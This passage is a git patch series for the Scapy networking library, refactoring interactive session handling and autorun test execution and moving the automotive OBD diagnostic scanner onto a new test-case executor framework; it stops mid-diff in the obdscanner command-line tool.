(#3271) * Replace GLOBKEYS by smarter session * Make autorun work with sessions * Apply small suggestions --- scapy/autorun.py | 51 ++++++++++++----------- scapy/compat.py | 8 ++-- scapy/main.py | 91 ++++++++++++++++++++++-------------------- scapy/modules/p0f.py | 1 - scapy/sendrecv.py | 1 - scapy/tools/UTscapy.py | 16 ++++---- test/regression.uts | 14 ++++++- 7 files changed, 98 insertions(+), 84 deletions(-) diff --git a/scapy/autorun.py b/scapy/autorun.py index e419f0c5b67..66f399f16dc 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -9,9 +9,10 @@ from __future__ import print_function import code -import sys import importlib import logging +import sys +import traceback from scapy.config import conf from scapy.themes import NoTheme, DefaultTheme, HTMLTheme2, LatexTheme2 @@ -31,50 +32,48 @@ class StopAutorun(Scapy_Exception): class ScapyAutorunInterpreter(code.InteractiveInterpreter): def __init__(self, *args, **kargs): code.InteractiveInterpreter.__init__(self, *args, **kargs) - self.error = 0 - - def showsyntaxerror(self, *args, **kargs): - self.error = 1 - return code.InteractiveInterpreter.showsyntaxerror(self, *args, **kargs) # noqa: E501 - def showtraceback(self, *args, **kargs): - self.error = 1 - exc_type, exc_value, exc_tb = sys.exc_info() - if isinstance(exc_value, StopAutorun): - raise exc_value - return code.InteractiveInterpreter.showtraceback(self, *args, **kargs) + def write(self, data): + pass -def autorun_commands(cmds, my_globals=None, ignore_globals=None, verb=None): +def autorun_commands(cmds, my_globals=None, verb=None): sv = conf.verb try: try: + interp = ScapyAutorunInterpreter() if my_globals is None: my_globals = importlib.import_module(".all", "scapy").__dict__ - if ignore_globals: - for ig in ignore_globals: - my_globals.pop(ig, None) + interp.locals = my_globals + try: + del six.moves.builtins.__dict__["scapy_session"]["_"] + except KeyError: + pass if verb is not None: conf.verb = verb - interp = ScapyAutorunInterpreter(my_globals) cmd = "" cmds = cmds.splitlines() cmds.append("") # ensure we finish multi-line commands cmds.reverse() - six.moves.builtins.__dict__["_"] = None while True: if cmd: sys.stderr.write(sys.__dict__.get("ps2", "... ")) else: - sys.stderr.write(str(sys.__dict__.get("ps1", sys.ps1))) + sys.stderr.write(sys.__dict__.get("ps1", ">>> ")) line = cmds.pop() print(line) cmd += "\n" + line + sys.last_value = None if interp.runsource(cmd): continue - if interp.error: - return 0 + if sys.last_value: # An error occurred + traceback.print_exception(sys.last_type, + sys.last_value, + sys.last_traceback.tb_next, + file=sys.stdout) + sys.last_value = None + return None cmd = "" if len(cmds) <= 1: break @@ -82,7 +81,10 @@ def autorun_commands(cmds, my_globals=None, ignore_globals=None, verb=None): pass finally: conf.verb = sv - return _ # noqa: F821 + try: + return six.moves.builtins.__dict__["scapy_session"]["_"] + except KeyError: + return six.moves.builtins.__dict__.get("_", None) class StringWriter(object): @@ -111,7 +113,7 @@ def autorun_get_interactive_session(cmds, **kargs): :param cmds: a list of commands to run :returns: (output, returned) contains both sys.stdout and sys.stderr logs """ - sstdout, sstderr = sys.stdout, sys.stderr + sstdout, sstderr, sexcepthook = sys.stdout, sys.stderr, sys.excepthook sw = StringWriter() h_old = log_scapy.handlers[0] log_scapy.removeHandler(h_old) @@ -119,12 +121,13 @@ def autorun_get_interactive_session(cmds, **kargs): try: try: sys.stdout = sys.stderr = sw + sys.excepthook = sys.__excepthook__ res = autorun_commands(cmds, **kargs) except StopAutorun as e: e.code_run = sw.s raise finally: - sys.stdout, sys.stderr = sstdout, sstderr + sys.stdout, sys.stderr, sys.excepthook = sstdout, sstderr, sexcepthook log_scapy.removeHandler(log_scapy.handlers[0]) log_scapy.addHandler(h_old) return sw.s, res diff --git a/scapy/compat.py b/scapy/compat.py index 561cd6aa351..c0575db1761 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -27,9 +27,9 @@ 'DefaultDict', 'Dict', 'Generic', - 'Iterable', 'IO', 'Iterable', + 'Iterable', 'Iterator', 'List', 'Literal', @@ -124,9 +124,9 @@ def __repr__(self): DefaultDict, Dict, Generic, + IO, Iterable, Iterator, - IO, List, NewType, NoReturn, @@ -154,17 +154,17 @@ def cast(_type, obj): # type: ignore collections.defaultdict) Dict = _FakeType("Dict", dict) # type: ignore Generic = _FakeType("Generic") + IO = _FakeType("IO") # type: ignore Iterable = _FakeType("Iterable") # type: ignore Iterator = _FakeType("Iterator") # type: ignore - IO = _FakeType("IO") # type: ignore List = _FakeType("List", list) # type: ignore NewType = _FakeType("NewType") NoReturn = _FakeType("NoReturn") # type: ignore Optional = _FakeType("Optional") Pattern = _FakeType("Pattern") # type: ignore Sequence = _FakeType("Sequence") # type: ignore - Set = _FakeType("Set", set) # type: ignore Sequence = _FakeType("Sequence", list) # type: ignore + Set = _FakeType("Set", set) # type: ignore Tuple = _FakeType("Tuple") Type = _FakeType("Type", type) TypeVar = _FakeType("TypeVar") # type: ignore diff --git a/scapy/main.py b/scapy/main.py index 62a3cdfd579..d9c5a567e7a 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -35,17 +35,13 @@ from scapy.consts import WINDOWS from scapy.compat import ( - cast, Any, Dict, List, Optional, - Tuple, - Union + Union, ) -IGNORED = list(six.moves.builtins.__dict__) - LAYER_ALIASES = { "tls": "tls.all" } @@ -119,11 +115,8 @@ def _read_config_file(cf, _globals=globals(), _locals=locals(), def _validate_local(x): # type: (str) -> bool - """Returns whether or not a variable should be imported. - Will return False for any default modules (sys), or if - they are detected as private vars (starting with a _)""" - global IGNORED - return x[0] != "_" and x not in IGNORED + """Returns whether or not a variable should be imported.""" + return x[0] != "_" DEFAULT_PRESTART_FILE = _probe_config_file(".scapy_prestart.py") @@ -296,6 +289,9 @@ def list_contrib(name=None, # type: Optional[str] def update_ipython_session(session): # type: (Dict[str, Any]) -> None """Updates IPython session with a custom one""" + if "_oh" not in session: + session["_oh"] = session["Out"] = {} + session["In"] = {} try: from IPython import get_ipython get_ipython().user_ns.update(session) @@ -303,6 +299,16 @@ def update_ipython_session(session): pass +def _scapy_builtins(): + # type: () -> Dict[str, Any] + """Load Scapy and return all builtins""" + return {k: v + for k, v in six.iteritems( + importlib.import_module(".all", "scapy").__dict__.copy() + ) + if _validate_local(k)} + + def save_session(fname="", session=None, pickleProto=-1): # type: (str, Optional[Dict[str, Any]], int) -> None """Save current Scapy session to the file specified in the fname arg. @@ -317,7 +323,7 @@ def save_session(fname="", session=None, pickleProto=-1): fname = conf.session if not fname: conf.session = fname = utils.get_temp_file(keep=True) - log_interactive.info("Use [%s] as session file", fname) + log_interactive.info("Saving session into [%s]", fname) if not session: try: @@ -326,21 +332,28 @@ def save_session(fname="", session=None, pickleProto=-1): except Exception: session = six.moves.builtins.__dict__["scapy_session"] - to_be_saved = cast(Dict[str, Any], session).copy() - if "__builtins__" in to_be_saved: - del(to_be_saved["__builtins__"]) + if not session: + log_interactive.error("No session found ?!") + return + + ignore = session.get("_scpybuiltins", []) + hard_ignore = ["scapy_session", "In", "Out"] + to_be_saved = session.copy() for k in list(to_be_saved): i = to_be_saved[k] - if hasattr(i, "__module__") and (k[0] == "_" or - i.__module__.startswith("IPython")): + if k[0] == "_": + del(to_be_saved[k]) + elif hasattr(i, "__module__") and i.__module__.startswith("IPython"): del(to_be_saved[k]) - if isinstance(i, ConfClass): + elif isinstance(i, ConfClass): del(to_be_saved[k]) - elif isinstance(i, (type, type, types.ModuleType)): + elif k in ignore or k in hard_ignore: + del(to_be_saved[k]) + elif isinstance(i, (type, types.ModuleType)): if k[0] != "_": - log_interactive.error("[%s] (%s) can't be saved.", k, - type(to_be_saved[k])) + log_interactive.warning("[%s] (%s) can't be saved.", k, + type(to_be_saved[k])) del(to_be_saved[k]) try: @@ -373,6 +386,7 @@ def load_session(fname=None): raise scapy_session = six.moves.builtins.__dict__["scapy_session"] + s.update({k: scapy_session[k] for k in scapy_session["_scpybuiltins"]}) scapy_session.clear() scapy_session.update(s) update_ipython_session(scapy_session) @@ -399,21 +413,12 @@ def update_session(fname=None): def init_session(session_name, # type: Optional[Union[str, None]] - mydict=None # type: Optional[Union[Dict[str, Any], None]] + mydict=None, # type: Optional[Union[Dict[str, Any], None]] + ret=False, # type: bool ): - # type: (...) -> Tuple[Dict[str, Any], List[str]] + # type: (...) -> Optional[Dict[str, Any]] from scapy.config import conf - SESSION = {} # type: Dict[str, Any] - GLOBKEYS = [] # type: List[str] - - scapy_builtins = {k: v - for k, v in six.iteritems( - importlib.import_module(".all", "scapy").__dict__ - ) - if _validate_local(k)} - six.moves.builtins.__dict__.update(scapy_builtins) - GLOBKEYS.extend(scapy_builtins) - GLOBKEYS.append("scapy_session") + SESSION = {} # type: Optional[Dict[str, Any]] if session_name: try: @@ -427,7 +432,7 @@ def init_session(session_name, # type: Optional[Union[str, None]] "rb")) except IOError: SESSION = six.moves.cPickle.load(open(session_name, "rb")) - log_loading.info("Using session [%s]", session_name) + log_loading.info("Using existing session [%s]", session_name) except ValueError: msg = "Error opening Python3 pickled session on Python2 [%s]" log_loading.error(msg, session_name) @@ -450,13 +455,19 @@ def init_session(session_name, # type: Optional[Union[str, None]] else: SESSION = {"conf": conf} + # Load Scapy + scapy_builtins = _scapy_builtins() + + SESSION.update(scapy_builtins) + SESSION["_scpybuiltins"] = scapy_builtins.keys() six.moves.builtins.__dict__["scapy_session"] = SESSION if mydict is not None: six.moves.builtins.__dict__["scapy_session"].update(mydict) update_ipython_session(mydict) - GLOBKEYS.extend(mydict) - return SESSION, GLOBKEYS + if ret: + return SESSION + return None ################ # Main # @@ -547,7 +558,7 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): # Reset sys.argv, otherwise IPython thinks it is for him sys.argv = sys.argv[:1] - SESSION, GLOBKEYS = init_session(session_name, mydict) + SESSION = init_session(session_name, mydict=mydict, ret=True) if STARTUP_FILE: _read_config_file(STARTUP_FILE, interactive=True) @@ -700,12 +711,6 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): if conf.session: save_session(conf.session, SESSION) - for k in GLOBKEYS: - try: - del(six.moves.builtins.__dict__[k]) - except Exception: - pass - if __name__ == "__main__": interact() diff --git a/scapy/modules/p0f.py b/scapy/modules/p0f.py index 74ee9f16071..5a0b562d6e5 100644 --- a/scapy/modules/p0f.py +++ b/scapy/modules/p0f.py @@ -24,7 +24,6 @@ from scapy.volatile import RandInt, RandByte, RandNum, RandShort, RandString from scapy.sendrecv import sniff from scapy.modules import six -from scapy.modules.six.moves import map, range if conf.route is None: # unused import, only to initialize conf.route import scapy.route # noqa: F401 diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 75d96f1d4b6..13d456c8f68 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -36,7 +36,6 @@ from scapy.error import log_runtime, log_interactive, Scapy_Exception from scapy.base_classes import Gen, SetGen from scapy.modules import six -from scapy.modules.six.moves import map from scapy.sessions import DefaultSession from scapy.supersocket import SuperSocket, IterSocket diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 337c76ff7b9..4ef51f532dd 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -519,10 +519,10 @@ def remove_empty_testsets(test_campaign): # RUN TEST # def run_test(test, get_interactive_session, theme, verb=3, - ignore_globals=None, my_globals=None): + my_globals=None): """An internal UTScapy function to run a single test""" start_time = time.time() - test.output, res = get_interactive_session(test.test.strip(), ignore_globals=ignore_globals, verb=verb, my_globals=my_globals) + test.output, res = get_interactive_session(test.test.strip(), verb=verb, my_globals=my_globals) test.result = "failed" try: if res is None or res: @@ -568,12 +568,13 @@ def import_UTscapy_tools(ses): def run_campaign(test_campaign, get_interactive_session, theme, drop_to_interpreter=False, verb=3, - ignore_globals=None, scapy_ses=None): + scapy_ses=None): passed = failed = 0 if test_campaign.preexec: test_campaign.preexec_output = get_interactive_session( - test_campaign.preexec.strip(), ignore_globals=ignore_globals, - my_globals=scapy_ses)[0] + test_campaign.preexec.strip(), + my_globals=scapy_ses + )[0] # Drop def drop(scapy_ses): @@ -853,7 +854,7 @@ def usage(): def execute_campaign(TESTFILE, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOCS, FORMAT, VERB, ONLYFAILED, CRC, INTERPRETER, autorun_func, theme, pos_begin=0, - ignore_globals=None, scapy_ses=None): # noqa: E501 + scapy_ses=None): # noqa: E501 # Parse test file try: test_campaign = parse_campaign_file(TESTFILE) @@ -897,7 +898,6 @@ def execute_campaign(TESTFILE, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOC test_campaign, autorun_func[FORMAT], theme, drop_to_interpreter=INTERPRETER, verb=VERB, - ignore_globals=None, scapy_ses=scapy_ses ) @@ -939,7 +939,6 @@ def main(): argv = sys.argv[1:] logger = logging.getLogger("scapy") logger.addHandler(logging.StreamHandler()) - ignore_globals = list(six.moves.builtins.__dict__) import scapy print(dash + " UTScapy - Scapy %s - %s" % ( @@ -1161,7 +1160,6 @@ def main(): FORMAT, VERB, ONLYFAILED, CRC, INTERPRETER, autorun_func, theme, pos_begin=pos_begin, - ignore_globals=ignore_globals, scapy_ses=copy.copy(scapy_ses) ) runned_campaigns.append(campaign) diff --git a/test/regression.uts b/test/regression.uts index d560c365617..fde46bb57a6 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -829,14 +829,18 @@ scapy_delete_temp_files() atol("www.secdev.org") == 3642339845 = Test autorun functions +~ autorun ret = autorun_get_text_interactive_session("IP().src") +ret assert(ret == (">>> IP().src\n'127.0.0.1'\n", '127.0.0.1')) ret = autorun_get_html_interactive_session("IP().src") +ret assert(ret == (">>> IP().src\n'127.0.0.1'\n", '127.0.0.1')) ret = autorun_get_latex_interactive_session("IP().src") +ret assert(ret == ("\\textcolor{blue}{{\\tt\\char62}{\\tt\\char62}{\\tt\\char62} }IP().src\n'127.0.0.1'\n", '127.0.0.1')) ret = autorun_get_text_interactive_session("scapy_undefined") @@ -884,8 +888,14 @@ conf.netcache = Test pyx detection functions -from scapy.extlib import _test_pyx -assert _test_pyx() == False +from mock import patch + +def _r(*args, **kwargs): + raise OSError + +with patch("scapy.extlib.subprocess.check_call", _r): + from scapy.extlib import _test_pyx + assert _test_pyx() == False = Test matplotlib detection functions From 35ee7253f0d12d626acb1418fa88046a844cf7d0 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 9 Jul 2021 15:30:12 +0200 Subject: [PATCH 0603/1632] Split #3054: Refactoring of OBDScanner (#3261) --- .config/mypy/mypy_enabled.txt | 1 + scapy/contrib/automotive/obd/scanner.py | 362 ++++++++++++------------ scapy/tools/automotive/obdscanner.py | 45 ++- test/contrib/automotive/obd/scanner.uts | 31 +- test/tools/obdscanner.uts | 8 +- 5 files changed, 230 insertions(+), 217 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 79ad20c411b..28ebedd8f78 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -53,6 +53,7 @@ scapy/contrib/automotive/gm/gmlan_ecu_states.py scapy/contrib/automotive/gm/gmlan_logging.py scapy/contrib/automotive/gm/gmlanutils.py scapy/contrib/automotive/kwp.py +scapy/contrib/automotive/obd/scanner.py scapy/contrib/automotive/scanner/configuration.py scapy/contrib/automotive/scanner/enumerator.py scapy/contrib/automotive/scanner/executor.py diff --git a/scapy/contrib/automotive/obd/scanner.py b/scapy/contrib/automotive/obd/scanner.py index 0fe9bd6e882..e1d55674447 100644 --- a/scapy/contrib/automotive/obd/scanner.py +++ b/scapy/contrib/automotive/obd/scanner.py @@ -8,112 +8,88 @@ # scapy.contrib.description = OnBoardDiagnosticScanner # scapy.contrib.status = loads - +from scapy.compat import List, Type, Any, Iterable from scapy.contrib.automotive.obd.obd import OBD, OBD_S03, OBD_S07, OBD_S0A, \ OBD_S01, OBD_S06, OBD_S08, OBD_S09, OBD_NR, OBD_S02, OBD_S02_Record -from scapy.contrib.automotive.enumerator import Scanner, Enumerator from scapy.config import conf +from scapy.packet import Packet from scapy.themes import BlackAndWhite +from scapy.contrib.automotive.scanner.enumerator import ServiceEnumerator, \ + _AutomotiveTestCaseScanResult, _AutomotiveTestCaseFilteredScanResult +from scapy.contrib.automotive.scanner.executor import \ + AutomotiveTestCaseExecutor +from scapy.contrib.automotive.ecu import EcuState +from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ + _SocketUnion -class OBD_Enumerator(Enumerator): - def scan(self, state, requests, exit_scan_on_first_negative_response=False, - retry_if_busy_returncode=True, retries=3, timeout=1, **kwargs): - # remove verbose from kwargs to not spam the output - kwargs.pop("verbose", None) - for req in requests: - res = None - for _ in range(retries): - res = self.sock.sr1(req, timeout=timeout, verbose=False, - **kwargs) - if not retry_if_busy_returncode: - break - elif res and res.service == 0x7f and \ - res.response_code == 0x21: - continue - - self.results.append(Enumerator.ScanResult(state, req, res)) - if res and res.service == 0x7f and \ - exit_scan_on_first_negative_response: - break - self.update_stats() - self.state_completed[state] = True - @property - def filtered_results(self): - return [r for r in super(OBD_Enumerator, self).filtered_results - if r.resp.service != 0x7f] - - def show_negative_response_details(self, dump=False): - nrs = [r.resp for r in self.results if r.resp is not None and - r.resp.service == 0x7f] - s = "" - if len(nrs): - nrcs = set([nr.response_code for nr in nrs]) - s += "These negative response codes were received " + \ - " ".join([hex(c) for c in nrcs]) + "\n" - for nrc in nrcs: - s += "\tNRC 0x%02x: %s received %d times" % ( - nrc, OBD_NR(response_code=nrc).sprintf( - "%OBD_NR.response_code%"), - len([nr for nr in nrs if nr.response_code == nrc])) - s += "\n" - if dump: - return s + "\n" - else: - print(s) +class OBD_Enumerator(ServiceEnumerator): + @staticmethod + def _get_negative_response_code(resp): + # type: (Packet) -> int + return resp.response_code @staticmethod - def get_label(response, - positive_case="PR: PositiveResponse", - negative_case="NR: NegativeResponse"): - return Enumerator.get_label( - response, positive_case, - response.sprintf("NR: %OBD_NR.response_code%")) + def _get_negative_response_desc(nrc): + # type: (int) -> str + return OBD_NR(response_code=nrc).sprintf("%OBD_NR.response_code%") + + @staticmethod + def _get_negative_response_label(response): + # type: (Packet) -> str + return response.sprintf("NR: %OBD_NR.response_code%") + + @property + def filtered_results(self): + # type: () -> List[_AutomotiveTestCaseFilteredScanResult] + return self.results_with_positive_response class OBD_Service_Enumerator(OBD_Enumerator): - def get_pkts(self, p_range): - raise NotImplementedError + def get_supported(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> List[int] + super(OBD_Service_Enumerator, self).execute( + socket, state, scan_range=range(0, 0xff, 0x20), + exit_scan_on_first_negative_response=True, **kwargs) - def get_supported(self, state, **kwargs): - pkts = self.get_pkts(range(0, 0xff, 0x20)) - super(OBD_Service_Enumerator, self).scan( - state, pkts, exit_scan_on_first_negative_response=True, **kwargs) supported = list() - for _, _, r in self.filtered_results: + for _, _, r, _, _ in self.results_with_positive_response: dr = r.data_records[0] key = next(iter((dr.lastlayer().fields.keys()))) supported += [int(i[-2:], 16) for i in getattr(dr, key, ["xxx00"])] return [i for i in supported if i % 0x20] - def scan(self, state, full_scan=False, **kwargs): + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + full_scan = kwargs.pop("full_scan", False) # type: bool if full_scan: - supported_pids = range(0x100) + super(OBD_Service_Enumerator, self).execute(socket, state, **kwargs) else: - supported_pids = self.get_supported(state, **kwargs) - pkts = self.get_pkts(supported_pids) - super(OBD_Service_Enumerator, self).scan(state, pkts, **kwargs) + supported_pids = self.get_supported(socket, state, **kwargs) + del self._request_iterators[state] + super(OBD_Service_Enumerator, self).execute( + socket, state, scan_range=supported_pids, **kwargs) @staticmethod def print_payload(resp): + # type: (Packet) -> str backup_ct = conf.color_theme conf.color_theme = BlackAndWhite() load = repr(resp.data_records[0].lastlayer()) conf.color_theme = backup_ct return load + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], self.print_payload) -class OBD_DTC_Enumerator(OBD_Enumerator): - request = None - - def scan(self, state, full_scan=False, **kwargs): - pkts = [self.request] - super(OBD_DTC_Enumerator, self).scan(state, pkts, **kwargs) +class OBD_DTC_Enumerator(OBD_Enumerator): @staticmethod def print_payload(resp): + # type: (Packet) -> str backup_ct = conf.color_theme conf.color_theme = BlackAndWhite() load = repr(resp.dtcs) @@ -122,139 +98,173 @@ def print_payload(resp): class OBD_S03_Enumerator(OBD_DTC_Enumerator): - description = "Available DTCs in OBD service 03" - request = OBD() / OBD_S03() + _description = "Available DTCs in OBD service 03" - @staticmethod - def get_table_entry(tup): - _, _, res = tup - label = OBD_Enumerator.get_label( - res, - positive_case=lambda: OBD_DTC_Enumerator.print_payload(res)) - return "Service 03", "%d DTCs" % res.count, label + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + return [OBD() / OBD_S03()] + + def _get_table_entry_x(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "Service 03" + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + resp = tup[2] + if resp is None: + return "Timeout" + else: + return "NR" if resp.service == 0x7f else "%d DTCs" % resp.count class OBD_S07_Enumerator(OBD_DTC_Enumerator): - description = "Available DTCs in OBD service 07" - request = OBD() / OBD_S07() + _description = "Available DTCs in OBD service 07" - @staticmethod - def get_table_entry(tup): - _, _, res = tup - label = OBD_Enumerator.get_label( - res, - positive_case=lambda: OBD_DTC_Enumerator.print_payload(res)) - return "Service 07", "%d DTCs" % res.count, label + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + return [OBD() / OBD_S07()] + + def _get_table_entry_x(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "Service 07" class OBD_S0A_Enumerator(OBD_DTC_Enumerator): - description = "Available DTCs in OBD service 10" - request = OBD() / OBD_S0A() + _description = "Available DTCs in OBD service 10" - @staticmethod - def get_table_entry(tup): - _, _, res = tup - label = OBD_Enumerator.get_label( - res, - positive_case=lambda: OBD_DTC_Enumerator.print_payload(res)) - return "Service 0A", "%d DTCs" % res.count, label + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + return [OBD() / OBD_S0A()] + def _get_table_entry_x(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "Service 0A" -class OBD_S01_Enumerator(OBD_Service_Enumerator): - description = "Available data in OBD service 01" - def get_pkts(self, p_range): - return (OBD() / OBD_S01(pid=[x]) for x in p_range) - - @staticmethod - def get_table_entry(tup): - _, _, res = tup - label = OBD_Enumerator.get_label( - res, - positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) - return ("Service 01", - "%s" % res.data_records[0].lastlayer().name, - label) +class OBD_S01_Enumerator(OBD_Service_Enumerator): + _description = "Available data in OBD service 01" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x100)) # type: Iterable[int] # noqa: E501 + return (OBD() / OBD_S01(pid=[x]) for x in scan_range) + + def _get_table_entry_x(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "Service 01" + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + resp = tup[2] + if resp is None: + return "Timeout" + else: + return "NR" if resp.service == 0x7f else \ + "%s" % resp.data_records[0].lastlayer().name class OBD_S02_Enumerator(OBD_Service_Enumerator): - description = "Available data in OBD service 02" + _description = "Available data in OBD service 02" - def get_pkts(self, p_range): + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x100)) # type: Iterable[int] # noqa: E501 return (OBD() / OBD_S02(requests=[OBD_S02_Record(pid=[x])]) - for x in p_range) - - @staticmethod - def get_table_entry(tup): - _, _, res = tup - label = OBD_Enumerator.get_label( - res, - positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) - return ("Service 02", - "%s" % res.data_records[0].lastlayer().name, - label) + for x in scan_range) + def _get_table_entry_x(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "Service 02" -class OBD_S06_Enumerator(OBD_Service_Enumerator): - description = "Available data in OBD service 06" + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + resp = tup[2] + if resp is None: + return "Timeout" + else: + return "NR" if resp.service == 0x7f else \ + "%s" % resp.data_records[0].lastlayer().name - def get_pkts(self, p_range): - return (OBD() / OBD_S06(mid=[x]) for x in p_range) - @staticmethod - def get_table_entry(tup): - _, req, res = tup - label = OBD_Enumerator.get_label( - res, - positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) - return ("Service 06", +class OBD_S06_Enumerator(OBD_Service_Enumerator): + _description = "Available data in OBD service 06" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x100)) # type: Iterable[int] # noqa: E501 + return (OBD() / OBD_S06(mid=[x]) for x in scan_range) + + def _get_table_entry_x(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "Service 06" + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + req = tup[1] + resp = tup[2] + if resp is None: + return "Timeout" + else: + return "NR" if resp.service == 0x7f else \ "0x%02x %s" % ( req.mid[0], - res.data_records[0].sprintf("%OBD_S06_PR_Record.mid%")), - label) + resp.data_records[0].sprintf("%OBD_S06_PR_Record.mid%")) class OBD_S08_Enumerator(OBD_Service_Enumerator): - description = "Available data in OBD service 08" - - def get_pkts(self, p_range): - return (OBD() / OBD_S08(tid=[x]) for x in p_range) - - @staticmethod - def get_table_entry(tup): - _, req, res = tup - label = OBD_Enumerator.get_label( - res, - positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) - return ("Service 08", - "0x%02x %s" % (req.tid[0], - res.data_records[0].lastlayer().name), - label) + _description = "Available data in OBD service 08" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x100)) # type: Iterable[int] # noqa: E501 + return (OBD() / OBD_S08(tid=[x]) for x in scan_range) + + def _get_table_entry_x(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "Service 08" + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + resp = tup[2] + if resp is None: + return "Timeout" + else: + return "NR" if resp.service == 0x7f else "0x%02x %s" % ( + tup[1].tid[0], resp.data_records[0].lastlayer().name) class OBD_S09_Enumerator(OBD_Service_Enumerator): - description = "Available data in OBD service 09" + _description = "Available data in OBD service 09" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x100)) # type: Iterable[int] # noqa: E501 + return (OBD() / OBD_S09(iid=[x]) for x in scan_range) + + def _get_table_entry_x(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "Service 09" + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + resp = tup[2] + if resp is None: + return "Timeout" + else: + return "NR" if resp.service == 0x7f else \ + "0x%02x %s" % (tup[1].iid[0], + resp.data_records[0].lastlayer().name) - def get_pkts(self, p_range): - return (OBD() / OBD_S09(iid=[x]) for x in p_range) - @staticmethod - def get_table_entry(tup): - _, req, res = tup - label = OBD_Enumerator.get_label( - res, - positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) - return ("Service 09", - "0x%02x %s" % (req.iid[0], - res.data_records[0].lastlayer().name), - label) - - -class OBD_Scanner(Scanner): - default_enumerator_clss = [ - OBD_S01_Enumerator, OBD_S02_Enumerator, OBD_S06_Enumerator, - OBD_S08_Enumerator, OBD_S09_Enumerator, OBD_S03_Enumerator, - OBD_S07_Enumerator, OBD_S0A_Enumerator] - - def enter_state(self, state): - return True +class OBD_Scanner(AutomotiveTestCaseExecutor): + @property + def enumerators(self): + # type: () -> List[AutomotiveTestCaseABC] + return self.configuration.test_cases + + @property + def default_test_case_clss(self): + # type: () -> List[Type[AutomotiveTestCaseABC]] + return [OBD_S01_Enumerator, OBD_S02_Enumerator, OBD_S06_Enumerator, + OBD_S08_Enumerator, OBD_S09_Enumerator, OBD_S03_Enumerator, + OBD_S07_Enumerator, OBD_S0A_Enumerator] diff --git a/scapy/tools/automotive/obdscanner.py b/scapy/tools/automotive/obdscanner.py index 240995d703c..154e1f09a72 100755 --- a/scapy/tools/automotive/obdscanner.py +++ b/scapy/tools/automotive/obdscanner.py @@ -27,7 +27,10 @@ from scapy.contrib.isotp import ISOTPSocket # noqa: E402 from scapy.contrib.cansocket import CANSocket, PYTHON_CAN # noqa: E402 from scapy.contrib.automotive.obd.obd import OBD # noqa: E402 -from scapy.contrib.automotive.obd.scanner import OBD_Scanner, OBD_S01_Enumerator, OBD_S02_Enumerator, OBD_S03_Enumerator, OBD_S06_Enumerator, OBD_S07_Enumerator, OBD_S08_Enumerator, OBD_S09_Enumerator, OBD_S0A_Enumerator # noqa: E402 E501 +from scapy.contrib.automotive.obd.scanner import OBD_Scanner, \ + OBD_S01_Enumerator, OBD_S02_Enumerator, OBD_S03_Enumerator, \ + OBD_S06_Enumerator, OBD_S07_Enumerator, OBD_S08_Enumerator, \ + OBD_S09_Enumerator, OBD_S0A_Enumerator # noqa: E402 def signal_handler(sig, frame): @@ -86,10 +89,9 @@ def main(): destination = 0x7df timeout = 0.1 full_scan = False - specific_scan = False verbose = False python_can_args = None - custom_enumerators = [] + enumerators = [] conf.verb = -1 options = getopt.getopt( @@ -119,29 +121,21 @@ def main(): elif opt in ('-f', '--full'): full_scan = True elif opt == '-1': - specific_scan = True - custom_enumerators += [OBD_S01_Enumerator] + enumerators += [OBD_S01_Enumerator] elif opt == '-2': - specific_scan = True - 